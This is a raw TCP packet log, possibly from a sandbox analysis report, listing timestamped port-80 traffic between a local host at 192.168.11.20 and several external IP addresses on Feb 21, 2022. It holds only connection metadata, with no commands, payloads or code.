                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.982449055 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.982700109 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.982744932 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.982881069 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.982953072 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983051062 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983118057 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983161926 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983241081 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983289957 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983408928 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983542919 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983546972 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983661890 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983715057 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.983793974 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984056950 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984066963 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984195948 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984245062 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984427929 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984431028 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984702110 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984827995 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984838009 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.984991074 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.985059977 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.985172033 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.985187054 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.985290051 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.152996063 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.153042078 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.153124094 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.153495073 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.153557062 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.153877020 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.153947115 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.154274940 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.154659986 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.154722929 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.154994965 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.155261040 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.155503035 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.155592918 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.155827045 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.155919075 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.156094074 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.156261921 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.156439066 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.156651020 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.156972885 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.157162905 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.157300949 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.157522917 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.199902058 CET804981545.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.199947119 CET804981545.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.200176001 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.200222969 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.332334042 CET804981545.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:28.332739115 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.172082901 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.180066109 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.180269003 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.183643103 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.183665037 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.183712959 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.184611082 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.191545963 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.191698074 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.191873074 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193443060 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193458080 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193551064 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193563938 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193579912 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193593025 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193665981 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193681955 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193783045 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193794966 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193854094 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.193993092 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.194202900 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.194293022 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.194600105 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.194776058 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.201399088 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.201504946 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.201741934 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.202091932 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203388929 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203490973 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203500986 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203620911 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203649998 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203747988 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203758955 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203771114 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203779936 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203825951 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203880072 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203891039 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203900099 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203907967 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203917027 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203979969 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.203989983 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.204004049 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.204133987 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.204143047 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.204183102 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.204372883 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.204533100 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.211395025 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.211570024 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.211664915 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.211802959 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213315010 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213416100 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213612080 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213622093 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213666916 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213843107 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213848114 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213857889 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213871002 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213879108 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213887930 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213896036 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.213948965 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214092970 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214102030 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214113951 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214128971 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214138985 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214147091 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214155912 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214164019 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214196920 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214329004 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214339018 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214376926 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214550972 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.214728117 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.221223116 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.221451998 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.221539021 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.221718073 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223334074 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223485947 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223551989 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223613024 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223727942 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223886967 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223905087 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223997116 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224092007 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224150896 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224162102 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224170923 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224258900 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224277020 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224293947 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224306107 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224318027 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224329948 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224342108 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224354029 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224380970 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224391937 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224404097 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224406004 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224419117 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224569082 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224585056 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224585056 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224596024 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224608898 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224620104 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224632978 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224791050 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224970102 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231167078 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231264114 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231343031 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231436968 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231518030 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231741905 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238049030 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238488913 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238672018 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238841057 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.246045113 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.253011942 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300225973 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300281048 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300673962 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300692081 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.310280085 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353749990 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353853941 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353955030 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353972912 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.357784033 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.382481098 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.382730961 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.384748936 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.384826899 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.385126114 CET4982880192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409534931 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409580946 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409672022 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409709930 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409759045 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409790993 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409861088 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409915924 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409931898 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409938097 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409996986 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410028934 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410032034 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410064936 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410065889 CET804982835.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410193920 CET4982880192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410203934 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410237074 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410248041 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410276890 CET4982880192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.434660912 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.434724092 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.434775114 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.434937954 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435009956 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435055971 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435065985 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435132027 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435197115 CET804982835.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435308933 CET804982835.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435415030 CET804982835.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435610056 CET4982880192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435664892 CET4982880192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.460268021 CET804982835.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.261478901 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.297163010 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.297342062 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299629927 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299684048 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299731016 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299907923 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.300096989 CET4983280192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.334840059 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.334911108 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335007906 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335016966 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335057974 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335131884 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335199118 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335289955 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335361004 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335380077 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335405111 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335407972 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335550070 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335577965 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.335728884 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.336390972 CET804983254.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.336541891 CET4983280192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.336623907 CET4983280192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.370510101 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.370574951 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.370683908 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.370712996 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.370786905 CET804983154.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.371018887 CET4983180192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.372351885 CET804983254.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.372431993 CET804983254.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.372490883 CET804983254.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.372716904 CET4983280192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.372761965 CET4983280192.168.11.2054.154.44.39
